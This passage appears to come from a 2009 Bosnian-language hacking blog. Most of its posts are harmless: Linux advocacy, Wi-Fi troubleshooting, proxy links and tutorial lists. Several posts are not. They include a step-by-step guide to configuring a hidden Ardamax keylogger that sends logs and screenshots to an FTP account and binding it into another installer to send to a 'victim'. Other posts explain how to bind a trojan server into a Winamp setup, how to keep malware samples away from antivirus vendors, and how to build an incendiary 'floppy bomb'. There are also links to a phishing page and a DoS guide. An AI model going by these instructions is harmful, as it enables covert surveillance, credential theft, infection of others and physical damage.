6. Eh sada smo u "Options" Tu se sve odnosi na vas dali zelite da vas keylogger bude tajna na vasem compu pa da vidite sta vasi ukucani rade za vasim compom...Tu opciju cini da se keylogger nevidi u start linu kada se pokrene :D Ako tako zelite onda kliknite na "Start in hidden mode" i kliknite na Next......I uvjek kada zelite da pokrenete keylogger lupite CTRL + SHIFT ALT + H istovremeno.

7. Uredu, Sada smo dosli u "Control" Kliknite na  "Send logs every" pa odaberite koliko minuta pa gdje zelite da vam dostavlja logove na e-mail na FTP   kliknite na FTP jer cu sada da bam pokazem kako se salje log na to :D uradite po slici



8.Eh valjda znate kako se pravi FTP.... registrirajte se na DriveHQ.com,i pobrinite se da ste na "Online Storage",i onda napravite novi folder sa imenom Logs (Tu ce vam dolaziti passwordi i sl.od zrtve kojoj ste poslali log)
Eh sada na vasem Ardamax keyloggeru stavite tamo gdje je FTP HOST  stavite ovo

http://ftp.drivehq.com

Pa sada pise "Remote Folder" Stavite pod naziv Logs
A gdje vam pise Username i Password tu ce te da stavite username i password od vaseg DriveHQ accaunta.
Na slici bi trebalo to da izgleda ovako :D



Vec smo odradili vecinu posla da napomenem da nismijete mjenjati password vaseg FTP servera ni brisati Logs ni mjenjati njegov naziv :D

9. Sada bi trebali biti u "Control" pobrinite se opet za kvadratice znaci sve nek su ticked ;)  i kliknite na next.

10.Tamo gdje vam pise  Screen Shot podesite ih kako vi zelite ...Ja licno predlazem svaka 2 sata po full screen  da vam salje i onda kliknite na next.

11.Sada nesto po meni najvaznije gdje ce te smjestiti keylogger  pod nazivom "Destenation"...
Sada tamo gdje pise Keylogger engine path kliknite na browse i odredite poziciju keylogger. Moj prijedlog opet My documents :D Pa izaberite ikonu za keylogger kliknite na next pa na Finish.

TRECA ETAPA (ZAVRSNA)
Ova stvarka vam je neophodna koliko zark covjeku ovim programom spajate keylogger i neki drugi program recimo msn setup  i sl :D
Evo vam ime i link programa :D

Easy Binder 2.0
 http://rapidshare.com/files/151005958/Easy_Binder.zip.html

Ako mi nevjerujte u link nemorate ga skidati trazite po google ;)
 Ovaj program je vec pre jednostavan za koristit pa samo idite na + dodajte keylogger koji ste smjestili u My Documents ili gdje vec :D isto tako uradite sa Necim cime spajate keylogger :D neku sliku ili nesto po vasoj zelji i saljite zrtvi i saznajte sta on sve kuca na svojoj tastaturi ;)

10.05.2009.

Kodek

Kome god trebaju kodeci za windos media izvolton

http://rapidshare.com/files/231473705/Klcodec414.rar.html

08.05.2009.

Dobre stranice

Evo da otvorim post gdje cu da stavim neke stranice koje su meni dakako korisne u izvrsavanju nekih stvari :D
Prvo mi mjesto zauzima:

www.hackthissite.org

Ta stranica je po divno cudo legalna za hackere znaci potrebna je registracija,na njoj imate realne misije o hacku o najlakse do najteze....ona najteza je da se srusi stranica www.hackthissite.org :D
Potrebno je krenuti dakle od Basic misija gdje je sve na neki nacin simple :D I kad uradite tu misju a da vam niko nedaje resenje vi onda znate da ste savladali taj dio hacka i da ste spremi ici dalje :D

Drugo mjesto zauzima stranica pod nazivom

www.virustotal.com
    
          ILI

novirusthanks.org

Da prvo kazem sta stranica radi.One zamjenjuju koliko se ja dobro sjecam 27 antivirusa pa stoga ako imate sumljiv fajl upload ga na ovu stranicu i dobicete rezultate :D Isti zadatak ima i novirusthanks.org
Eh u cemu je sad razlika..... ako ste vi napravili neki virus ili nesto slicno i hocete da vidite jeli dovoljno dobar i ako uradite upload na virustotal za par dana ili sledeci mjesec vas "Virus" ce biti prepoznat od strane svakog antivirusa !!
Zasto ??
Zato sto kada vi uradite na upload virustotal-a on provjerava ima li kakvog zlocudnog koda ako ima salje se taj kod Antivirusnim kompanijama te tako za jedan mjesec kada svi antivirusi budi izvrsili update vi necete biti u mogucnosti da zarazite nijednu osobu.
Sto je razlika od novirusthanks.org jer njegov kod uopste nedolazi do AV kompanija ;)

U sledecim postovima se potrduim da napisem nesto o hacku web stranica te ako ste zainteresirani samo komentarisite ;)

07.05.2009.

Problem sa internetom na ubuntu linuxu

Po narudzbi jednog od posjetilaca dobio sam zadatak da mu pomognem oko problema sa internetom...
U pitanju je bezicni internet koliko ja znam i da mu automatski prepoznao mreze....
Licno i iskreno nikad nisam imao problema sa internetom na linux sistemima jer ADSL je vecinom radio svoje onoliko koliko i sam Linux OS (Operativni Sistem)...

Pa sam odlucio malo da procackam google i da vidim probleme vecine korisnika koji nisu mogli da uspostave konekciju na svojim racunarima.Pa iz svega toga sam izvukao sljedece informacije za koje nisam neznam koliko mogu da pomognu....

Znaci treba kliknuti na network-manager ikonu pokraj sata (na ikoni su dva ekrana) i prikazat će ti se padajući izbornik s dostupnim/detektiranim bežičnim mrežama oko tebe. Kliknete na svoju mrežu i to je to. Ako je mreža zaštićena WEP/WPA ključem, network-manager će pitati da upiše se lozinka.Ako nema nikakvih mreza napravite vi sami sebi novu :D
 Odaberete vrstu konekcije pa napisete ip getaway i dns



To je onaj od jednostavnijih nacina ako to ne uspije onda ide dalje....

Ni pod kojim slucajem nesmjete koristiti drivere od widowza prilkom instalacije jer ih linux treba sam da nade i skine znaci za linux nisu potrebni driveri to upamtite !!!
Ako to vec ocajnicki zelite i da probate pokusajte instalirati ovo i preko toga drivere za net

http://packages.ubuntu.com/intrepid/ndiswrapper-common

http://packages.ubuntu.com/intrepid/ndiswrapper-utils-1.9

 

06.05.2009.

Sta je bolje xp ili linux

10 razloga zasto je linux bolji od drugih OS systema

Posto sam presao na linux bilo bi vrijeme da stavimo nesto i o njemu evo vam link za download naravno FREE,linux ubuntu,

http://www.ubuntu.com/getubuntu/download

No da vam malo objasnim oko linuxa onoliko koliko ja mogu posto sam na linuxu mozdaaaa svega ukupno 5-6 dana hehehe.

Ovak sada cu vam reci 10 razloga zasto je linux bolji od xp i zasto svima preporucujem da predu na linux za pocetak mozete odabrati ubuntu

1 RAZLOG

Zato sto je besplatan,za xp morate platiti 300 KM u drzavama gdje pirat nije dozvoljen.A dabi kupili xp morate otici negdje pa ga kupiti a zamislite da dobijete pogresan serial key a net club daleko pa valja se ponovo vracati.....Sa linuxom tog shita nema linux narucite preko stranice i ljudi vam postom donesu na kucnom pragu orginalni linux.Znaci daleko je pristupacniji



2 RAZLOG

Za razliku od Windowsa, Linux sadrži na stotine različitih distribucija prilagođenih pojednim korisniku, tvrtki ili serveru. Svaka od njih ima svojih prednosti i mana, ali zbog velikog izbora sigurno ćete naći onu koja odgovara vašim potrebama. Nove verzije distribucija izlaze vrlo često, u periodima od par mjeseci. Sa druge strane, Windows je jedan, i Microsft nas počasti sa novom verzijom svakih par godina. Svaka od njih dolazi u "prividno" više izdanja, tipa "Home", "Basic" i sl. što su zapravo samo okljareštene verzije cijelih Windowsa sa nižom cijenom.



3 RAZLOG

Windows dolazi sa standardnim (i jedinim) grafičkim okruženjem na kojemu su moguće male modifikacije tipa promjene boje pozadine, prozora i sl. Linux vam pak dopušta da si izaberete radnu okolinu, onu koja odgovara vašim potrebama, hardverskim zahtijevima i sl. (GNOME, KDE, XFCE, Motif itd...) Dalje, tu su i CompizFusion efekti, koji osim što izgledaju impresivno, imaju nevjerovatnu funkcionalnost.



4 RAZLOG

Ovaj mi se razlog najvise svida jer na xp brate dragi ogulise virusi hehe pa onda

svi znamo kako su Windowsi osijetljivi na viruse, adware, spyware i slične neugodnosti koje zahvate svakoga tko se koristi internetom. Riješenje je posegnuti u djep i kupiti neki antivirusni alat. Ali kako svakodnevno izlaze na desetke novih virusa, zaštita je sve samo ne potpuna. Linux korisnici surfaju internetom bez antivirusnih alata (iako postoje) bez ikakve bojazni da bi pokupili neki crv, virus, trojanac ili nesto slicno.Zapravo linuxom system ja takav da ima razlicit kod svega tako kada virus ude u linux bukvalno se osjeca kao alisa u zemlji cuda (MOJ FAZON HEHE)



5 RAZLOG

Linux je puno lakše instalirati nego Windowse. Dapače, danas većina distribucija ima tzv. "LiveCD" koji pokrene čitav operativni sustav bez da ga instalira na hard disk. Tako slobodno možete koristi sve programe, surfati internetom, pregledati sve i donjeti odluku o instalaciji. Dovoljno je kliknuti na ikonu na desktopu, proći kroz par koraka, sačekati da se instalacija dovrši, a vi za to vrijeme možete igrati neku igricu ili čitati vijesti sa vašeg omiljenog internet portala.JEST DA SAM SE NAPOCEKU NAPATIO SA INSTALACIJOM ALI DA SE TO SVE RIJESITI.



6 RAZLOG

Najgora stvar koja vam se može desiti je plavi ekran (BSD) pred kraj cijelodnevnog pisanja seminara. Windowsi su poznati po svojoj nestabilnosti i čestim rušenjima. Što više aplikacija instalirate, to su veće šanse da će vam se srušiti Windowsi. Većina korisnika u tim situacijama poseže za ponovnom instalacijom, što za posljedicu često ima gubitak osobnih podataka sa diska. U Linuxu jezgra (kernel) operativnog sistema je odvojena od grafičkog okruženja, tako ako vam se sruši neka određena aplikacija, to neće utijecati na vaš operativni sistem.STO JE RECIMO IZVRSNO !!!!!



7 RAZLOG

Skoro svi programi za Linux su u potpunosti besplatni, čak i kompleksni uredski alati poput OpenOffice-a ili GIMP-a (alat za obradu slika koji se da poistovijetiti sa Photoshopom). Većina njih dolazi sa izvornim kodom, pa ako imate programerskih viještina možete svaki program posebno prilagoditi svojim potrebama. U slučaju da vam zatreba neki program koji je napravljen isključivo za windowse, možete ga koristiti i pod Linuxom uz pomoć programa WINE. Sramotno je što Windowsi s obzirom na cijenu, dolaze poprilično "goli" što se tiče programa. Možete slušati glazbu u MediaPlayeru, napisati tekst u Writepad-u, nacrtati nešto u Paintu i to je otprilike to. Sve ostalo morate kupiti, počevši od programa za snimanje DVD-ova, uredskih alata, antivirusa i slično što cijenu korištenja Windowsa diže daleko iznad 1000KM. Linux dolazi out-of-the-box sa skoro svim alatima koji će vam ikad zatrebati.Fakat je gotiva system radio kao limewire ukucate sto treba i idete download



8 RAZLOG

Linux može pristupiti stotinama datotečnih sustava, za razliku od Windowsa koji koriste samo FAT32/NTFS. U Linuxu možete pokrenuti programe napisane za Windowse (WINE), igrati Windows igrice (Cedega, CrossoverOffice), dopisivati se sa prijateljima koji koriste ICQ, MSN, AOL ili nešto drugo.



9 RAZLOG

Linux će sasvim uredno raditi sa svim 3D efektima uključenima na nekom starijem stroju, sa 512MB memorije i grafičkom karticom starije generacije. O Windows Visti ne trebate niti razmišljati ukoliko nemate najnoviji hardver.



10 RAZLOG

Windows programe pišu programeri koji prave aplikacije koje izgledaju i ponašaju se onako kako ih je tvrtka zamislila. Oni će obaviti svoj posao i dobiti svoju plaću. Tu sve završava. Linux programe pišu stručnjaci-entuzijasti, onako kako su ih oni zamislili, za svoju dušu i za dobrobit Linux zajednice. Sa programom pružaju besplatno i njegov izvorni kod, tako da netko jos stručniji može napraviti još bolji proizvod. Ishod svega toga su stotine izuzetno stabilnih i kvalitetnih aplikacija

dostupnih svima.



Ehhhh stari losi xp,da vas pitam jedno pitanje odgovorite iskreno jeste li vec skinuli linux

06.05.2009.

Enter or Leave

Ovo je manje vise za neke skolarce i sl. mozda vam se desilo da u skoli nemozete da udete u odredenu stranicu npr: facebook,dernek,serials i sl. evo par stranica preko kojih mozete da surfate na zabranjenim stranicama......... A hbg mozda nisam dobro objasnio no shvaticete vi to ;) sam pogledajte:

http://www.vtunnel.com/

http://www.
soaleaders.com/

http://www.proxysite.org/

http://www.allproxysites.com/


A za ostatak mozete koristi google i da a ako koristite firefox idite na tools,options, i na privacy i exeptions tu kliknite na alow for session za odredenu stranicu i trebalo bi vam uci bez nekih vecih problema....
Ovo jos nije 100% rijesenje ali trebate sigurno probati :D

04.05.2009.

Prijedlog......

Ovdje napisite kakve bi izmjene zelili na blogu.....
Zelite li da stavljam ankete
Zelite li da stavim Muziku u pozadinu
Sta mislite o zabrani desnog klika
O cemu bi vi da se vise pise i sl.
Sve vase prijedloge i zalbe ocekujem u komentarima

PS: Ako zelite da nas web site i forum www.life4hack.com.ba brze stupi u funckiju reklamirajte ovaj blog na sto vise drugih foruma kako bi skupio clanova dovoljnih za otvaranje foruma

                                                  HVALA !!!!!!!

04.05.2009.

Host koji podrzava php

04.05.2009.

Malo vise o trojancima

OVO JE COPY/PASTE  !!!!!
AUTORE NECU NAVESTI JER SAM ISAO PO GOOGLU I SAMO TRAZIO....
ZASTO ??
ZATO DA VAS UVJERIM DA SVE ODGOVORE KOJE POSTAVITE OVDJE PRVO MOZETE NACI NA GOOGLE PA TEK OVDJE ;)
NESTO MI VAS ZAO PA SAM NA KRAJU JA DODAO SVOG TEKSTA DA BI VAM BILO LASKE ;)


Trojanski virusi su posebna vrsta virusa. Lažno se predstave kao neki korisni programi (nekakav player i sl.), a kad ga pokreneš on od tvoga računala radi što želi. U nekim slučajevima radi se o programima koji se instaliraju na računalo bez tvog znanja. Mogu predstavljati "mala vrata" na koja, dok si na Internetu, može netko ući u tvoje računalo i preuzeti upravljanje njime (kopirati podatke, pokretati programe i druge grozne stvari). Pri tome koristi tzv. rupe u sustavu pa je važno redovito skidati zakrpe operativnog sustava i programa za rad na Internetu. Trojanci se dobro skrivaju od nekih antivirusnih programa, no često ga AntiSpyware pronađe. Ako to ne uspije, moraju se srušiti Windowsi.

Primjeri:
DTR Trojan

Baš poput Spywarea Hotbar, DTR Trojan omogućava uljezu da ti mijenja podatke na računalu, kopira ih, premiješta, briše, usnimava i sve ostalo kao da je tvoje računalo njegovo. Da bi uništio DTR Trojan, otvori Registry Editor(Start, Run, regedit). Otvori u njemu sljedeće: HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun i obriši nbsession i nbsystem.exe, a zatim u mapi System (ili System32, ovisno gdje je smješten), obriši nbsystem.exe.



Harms Trojan

Harms Trojan je trojanski virus koji ti jednostavno uništava podatke na računalu. Da bi ga uništio, kombinacijom tipaka Ctrl+Alt+Delete otvori Task Manager i uništi proces 0887df.exe i 0887e0.exe, a zatim u programu Search potraži istoimene datoteke i obriši ih.



Trojan VX Downloader

Trojan VX Downloader je Trojanski virus koji ti snima razne Spywaree, Adwaree i šalje Spam E-mailove.



Win Desktop Adware

Win Desktop Adware ima takvo ime, no nije Adware. On ti mijenja desktop i otvara razne reklame na njemu.



Mendware

Mendware je Trojanac koji najčešće dobiješ preko Spam E-mailova. Dok ga imaš, s mnogih servera ti se mogu instalirati razni programi.



Hanuman

Hanuman je Trojanac koji otvara port 3333. Može biti vrlo opasan.



CrashCool

CrashCool je Trojanac koji ti otvori i zatvori CD-ROM kad se instalira. Otvara port 9898 ili 8888 preko kojih ti njegov autor može na računalu raditi što hoće.



Buttman

Buttman je Trojanac koji se otvara u pozadini kao serverski proces. Svom autoru otvara pristup tvom računalu.

MOJ TEKST :
Predhodni tekst mi je uzeo vecinu nacina kako da vam objasnim neke stvari oko trojanaca ali opet se da nesto za objasniti.......
Sada kako znate kako se zaraziti trojancem red je i da naucite kako i vi nekoga drugog da zarazite njime :D

Imena vec trojanaca imate vase je da nadete setup iskljucite antivirus i instalirate si ga :D prilkom instalacije stvori vam se ikonica "server" to je to trazeno zlo koje se salje drugim zrtvama :D uzmete neki binder sto spaja programe recimo uzmete setup od winampa i uzmete ovaj server spojite ih i posaljet nekome on to instalira a vi ovamo kao u kontrolnoj sobi imate sv e mogucnosti koje rade trojanac. U komentarima postavite pitanje ako vam jos nesto nije jasno pa cu vam odgovoriti :D

04.05.2009.

Kako doci do necije IP adrese ...

Sjecate se kada smo radili sa batch kodovima..... sada  radimo slican princip... Cilj ej doci do IP adrese,koristio sam malo google kako bi vam nasao sto vise nacina nadam se da necete zamjeriti na tome ;)

Otvorite notepad i upišite:

@echo.
@color 09
@netstat -n
@echo.
@pause


zatim spremite tekst(Save as) "GetIp.cmd" (bez navodnika). I pokrenite :D

Sledeci nacin:

Kada se dopisujete sa nekim preko msn-a vasa sema protokola informacija ide ovako

prva osoba ----msn-----server-----msn------druga osoba

Kada saljete neki fajl ide ovako

prva osoba-------msn----druga osoba

Zasto bash ovako ???
Zat sto sam server po mojoj teorijiji nebi mogao da podnese toliki protokol kada bi se slali fajlovi ...mislim zamislite kada bi vi slali neki fajl nekom rodaku prijatelju da prvo morate da cekate da se uradi upload na hotmail server pa tek onda da se salje vasem drugom korisniku...
Zasto sam ovo napisao ????

Pa vidite kada se salje fajl racunari se recimo bukvalno povezuju jedni sa drugim jedna IP sa drugom IP.
Pa stoga kada pisete sa nekom osobom uradite sledece
Idite na cmd kucajte netstat -a i izbacice vam spisak IP adresa sa kojima vi imate neke direktne "veze". Eh i onda posaljite neki veci fajl toj osobi skojom pricate i od koje zelite da saznate IP  i opet ponovite proces sa netstat i sta se desava  ??
Treba da se pojavi nova IP adresa to je sigurno ona skojom se vas racunar povezuje ;)
good luck.

Sledeci nacin:
Sigurno posjedujete neki forum ili nesh slicno ako ne onda napravite imate dulum free foruma po netu ;) napravite jedan i pozovite odredenu osobu na tu stranicu,smislite neki nacin kako da je navratite na to,jer ako ste admin na nekom forumu vi imate citav predgled stvari koji mozete da nadzirete to jeste vidite IP adrese onoga ko vam posjecuje forum ili nesh slicno bio to gost ili registrovani clan ;)
I na kraju ako zelite da saznate svoju IP adresu idite na cmd ukucajte ipconfig i prva adresa koja vam se izbaci to je vasa ;)

Valjda sam vam naveo dovoljno nacina kako da saznate neciju IP a uostalom culi ste za google ;)

03.05.2009.

Uplasite nekoga sakrijte mu particije XD

Evo dodete vi kod nekog frenda malo vam pici po zivcima i ja vam kazem nacin kako malo da ga uplasite sakrijte mu praticiju na harddiscu a to mozete ovako



udjete u START-->RUN i upisete CMD

Sljedece,otvoriti ce vam se crni prozorcic i tu upisete DISKPART

Zatim upisete LIST VOLUME i trebali bi te vidjet ovo:

Volume 0 E drive CD ROM .........

Volume 1 C drive ......... ...............

Volume 3 D drive ........... ...........



Sljedece sto trebate je odabrati koju od prticija zelite skriti

Znaci sada upisete SELECT VOLUME (broj) onoga sto zelite sakriti

Kad ste selektirali upisete REMOVE LETTER (slovo) koje iznacava odredjenu

particiju.

I sakrili ste particiju....JEDNOSTAVNO heheheh...

Kada je zelite vratiti cjeli postupak ponovite samo na kraju umjesto

REMOVE LETTER upisete ASSIGN LETTER....



PS: KOD LIST VOLUME NETREBA BAS DA VAM PISE OVAK KAO KOD MENE VOLUME 0 E DRIVE KOD VAS MOZE PISATI NESTO SASVIM DRUGO ZAVISI KOLIKO HARDISKOVA IMATE CD-ROMOVA I TIH SRANJA UGLAVNOM AKO BUDETE IMALI KAKVIH PROBLEMA SAMO JAVITE :)

03.05.2009.

Floopy Bomba

Evo jednog tutoriala koji vam mozhda nikada netje koristiti.(znam,da oce,al eto..)



Kako od diskete napraviti bombu???



Trebash:

1.) Disketu

2.) Makaze

3.) Bjele ili plave šibice(Moraju biti ove boje)

4.) Cisti lak za nokte



1.)Pazhljivo otvori disketu

2.)Skloni platno koji pokriva unutrashnjost

3.)”Istresi” dosta praha sa shibica u neku posudu,koristi drvenu “stvar” za skidanje praha,metalna nije preporuchljiva

4.)Nakon sto ste “nakupili” dosta praha,stavite ga po disku

5.)Koristetji lak za nokte,rasprshite ga po chitavom disku

6.)Pusti nek se osushi

7.)Pazhljivo spoji i drugi dio diskete sa prvim



KADA JE DISK U DRIVE-U DRIVE SE TRUDI PROCHITATI DISK , SHTO IZAZIVA MALU ISKRICU(KOJA JE DOVOLJNA DA IZAZOVE EXPLOZIJU I RAZNESE DRIVE)
01.05.2009.

Malo da uciteeeeeeeeeee :D skupljena moja kolekcija

HTML Tutorials
Learn HTML
Learn XHTML
Learn CSS
Learn TCP/IP

XML Tutorials
Learn XML
Learn DTD
Learn XML DOM
Learn XSL
Learn XSLT
Learn XSL-FO
Learn XPath
Learn XQuery
Learn XLink
Learn XPointer
Learn Schema
Learn XForms
Learn SOAP
Learn WSDL
Learn RDF
Learn RSS
Learn WAP
Learn Web Services

Browser Scripting
Learn JavaScript
Learn HTML DOM
Learn DHTML
Learn VBScript
Learn AJAX
Learn E4X
Learn WMLScript

Server Scripting
Learn SQL
Learn ASP
Learn ADO
Learn PHP

.NET (dotnet)
.NET Microsoft
.NET ASP
.NET Mobile

Multimedia
Learn Media
Learn SMIL
Learn SVG
Learn Flash

Web Building
Web Building
Web Browsers
Web Hosting
Web W3C
Web Quality
Web Semantic
Web Careers
Web Certification

http://www.w3schools.com/
******************************************
Knjiga za windowz servere,detaljno objasnjeno
http://depositfiles.com/ru/files/5z97e123g
******************************************
Sve tajne interneta uzduz i poprijeko
Code:
http://rapidshare.com/files/188831229/Sve_tajne_-_Internet_uzduz_i_poprijeko.rar.html

************************************
Kompletno o DoS
Code:
http://rapidshare.com/files/188831677/dos.txt.html

***************************
TCP-IP tutorial oko 5000 fajlova velicina 14427 KB
Code:
http://rapidshare.com/files/188834895/TCP-IP.rar.html

**************************
Phising page
Code:
http://rapidshare.com/files/188835719/Phising_page.txt.html

***************************
Kolekcija za budale :D jest da je na engleskom nesto ali ima i na nasem,velicina 70201 KB
Code:
http://rapidshare.com/files/188851282/Hacking_higtschool.rar.html
THE QUIETER YOU BECOME THE MORE ARE ABLE TO HEAR
<< 05/2009 >>
nedponutosricetpetsub
0102
03040506070809
10111213141516
17181920212223
24252627282930
31

OVO SU REKLAME

http://schluesseldienst-not-koeln.de/

CboX















Anketa
Dali zelite da se napravi forum za ovaj blog ?
Da
Ne
Pa moze,ali nije potrebno
Ma kakvi blog ti i ovako propada



Sta mislite o blogu ?
Samo Tako nastavi
Pa moze proci
Lose je...Tekst nevalja
Hoces li sta pametno napisati ?
Vidio sam i boljih :p
Ovo izbrisi ....
Nista od navedenog

Baneri

Novosti
KAKO POSTATI MOJ REFERRAL NA ADF.LY ?

Sve što trebate je registrirati svoj adf.ly account preko ovoga linka:
http://adf.ly/?id=2684620

http://schluesseldienst-not-koeln.de/

Nakon toga mi se javite na e-mail adflyzarada@gmail.com, sa vašim referral linkom da vas zabilježim u svoju referral podršku.
ŠTO DOBIVATE KAO MOJ REFERRAL?

Kao moj referral dobivate svu potrebnu pomoć i podršku, te odgovore na sva vaša pitanja i nejasnoče. Ukoliko se pokažete aktivni besplatno ćete dobiti iframe skriptu u 3 koraka za facebook.
Također dobit će te pomoć pri promociji vaših facebook grupa, twitter profila, youtube videa...

Za sve što trebate tu sam :)

MOJI FAVORITI

BROJAC POSJETA
152839